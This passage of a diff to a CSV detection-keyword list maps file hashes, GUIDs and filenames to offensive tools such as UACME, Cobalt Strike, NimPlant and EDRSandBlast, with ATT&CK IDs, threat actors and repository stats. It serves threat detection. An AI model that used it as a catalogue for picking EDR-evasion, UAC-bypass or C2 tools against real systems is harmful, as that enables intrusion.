"*77b78b6e16972c318fcbba39976858787cc31038f82952d2a94f844f5847a61e*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" -"*785ca1f83eab4185774f140b74d30823a69dec01ca06ccba4bfd8d1ddd3255d9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*789CF3CBCC0DC849CC2B51703652084E2D2A4B2D02003B5C0650*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*785ca1f83eab4185774f140b74d30823a69dec01ca06ccba4bfd8d1ddd3255d9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*789CF3CBCC0DC849CC2B51703652084E2D2A4B2D02003B5C0650*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*79F54747-048D-4FD6-AEF4-7B098F923FD8*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - 
T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" -"*7be72ada31cc042e7dea712308f59235516a6ae1d434b24645cd4726a12b5d64*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*7be72ada31cc042e7dea712308f59235516a6ae1d434b24645cd4726a12b5d64*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*7CFC52.dll*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*7CFC52CD3F.dll*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*7E3E2ECE-D1EB-43C6-8C83-B52B7571954B*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" -"*7E3E2ECE-D1EB-43C6-8C83-B52B7571954B*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the 
same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*7E3E2ECE-D1EB-43C6-8C83-B52B7571954B*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*7E47D586-DDC6-4382-848C-5CF0798084E1*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" -"*7e8e77d67c76bdf7bf34f0aef7cb3f18f51efb0b2ab20ffe600240824331986e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*7e8e77d67c76bdf7bf34f0aef7cb3f18f51efb0b2ab20ffe600240824331986e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" 
"*7E9729AA-4CF2-4D0A-8183-7FB7CE7A5B1A*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","0","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z" "*7H0LmBxFtXBPd0/3vHe7Z3dmdrPZmTzp3ZldQrJ5LOGxeZ*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*7L0LgBxFtTDc093TPe/dntnM7G6Sncm*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" -"*7z2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*802d51a4b440e079020103c46a56967fb6e32f95188600388ef7c8b91dc746e8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf*","offensive_tool_keyword","UACME","Defeating Windows User 
Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*81E60DC6-694E-4F51-88FA-6F481B9A4208*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","9","3","259","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" -"*82277B35-D159-4B44-8D54-FB66EDD58D5C*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","727","148","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" -"*82928d0a1d3263a9676b6587feba86e1716c1a2c20294c6c2210d4557975ff69*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*7z2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*802d51a4b440e079020103c46a56967fb6e32f95188600388ef7c8b91dc746e8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*81E60DC6-694E-4F51-88FA-6F481B9A4208*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*82277B35-D159-4B44-8D54-FB66EDD58D5C*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" +"*82928d0a1d3263a9676b6587feba86e1716c1a2c20294c6c2210d4557975ff69*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*83035080-7788-4EA3-82EE-6C06D2E6891F*","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","0","N/A","9","3","224","40","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" "*8304a65e6096bcf63f30592b8049d47883c3c755600796c60a36c4c492f7af37*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" -"*835798995e6df38e12ef18fdcfda6dd1bb8fdffb567a03da46ed1ab7b66a0194*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*83772aa217508279294d91af5cfabec9b5e00b836a2e2f5fe37cf1ebc2905a52*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*847D29FF-8BBC-4068-8BE1-D84B1089B3C0*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*835798995e6df38e12ef18fdcfda6dd1bb8fdffb567a03da46ed1ab7b66a0194*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - 
TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*83772aa217508279294d91af5cfabec9b5e00b836a2e2f5fe37cf1ebc2905a52*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*847D29FF-8BBC-4068-8BE1-D84B1089B3C0*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*854A20FB-2D44-457D-992F-EF13785D2B51*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","0","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" -"*866e5289337ab033f89bc57c5274c7ca*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1097","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" -"*8776cfacd0e7e409a5f5168261089e6386eeffacedc9158c19d86dfc78e0dc61*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*866e5289337ab033f89bc57c5274c7ca*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - 
APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*8776cfacd0e7e409a5f5168261089e6386eeffacedc9158c19d86dfc78e0dc61*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*87904247-C363-4F12-A13A-3DA484913F9E*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*879A49C7-0493-4235-85F6-EBF962613A76*","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","0","N/A","7","2","191","19","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" -"*87a210d7a7ed8cd635437bfe6d79bd9ee9ca8d6ef9079f9b30b4162e3843ad37*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*87cc72bb8e3f1534bee09ee278ecd928d975ebb94aeffc767b67249815a0bf3a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*87a210d7a7ed8cd635437bfe6d79bd9ee9ca8d6ef9079f9b30b4162e3843ad37*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*87cc72bb8e3f1534bee09ee278ecd928d975ebb94aeffc767b67249815a0bf3a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*881D4D67-46DD-4F40-A813-C9D3C8BE0965*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" -"*881D4D67-46DD-4F40-A813-C9D3C8BE0965*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","315","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" -"*893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" 
+"*881D4D67-46DD-4F40-A813-C9D3C8BE0965*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*894a784e-e04c-483c-a762-b6c03e744d0b*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" -"*8ac147d1db55cbfaaa3a7cd3c7ae1da147c9add049e8150dab26609a22a53a10*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*8d41849fa260b5a4a6a05db8312b60b3f6f2b5efe4f4d4fdd05c70701c7aabed*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" 
-"*8f25cacb678c008ff3f205dc9d66f4411902b867df8656ea758c0c6d2141e18f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*8ac147d1db55cbfaaa3a7cd3c7ae1da147c9add049e8150dab26609a22a53a10*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*8d41849fa260b5a4a6a05db8312b60b3f6f2b5efe4f4d4fdd05c70701c7aabed*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*8f25cacb678c008ff3f205dc9d66f4411902b867df8656ea758c0c6d2141e18f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*90F6244A-5EEE-4A7A-8C75-FA6A52DF34D3*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","0","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z" -"*912bbb35787c58046da31f1608d07a68753fa4bd8782e29ef80eb51e65e887d2*","offensive_tool_keyword","UACME","Defeating 
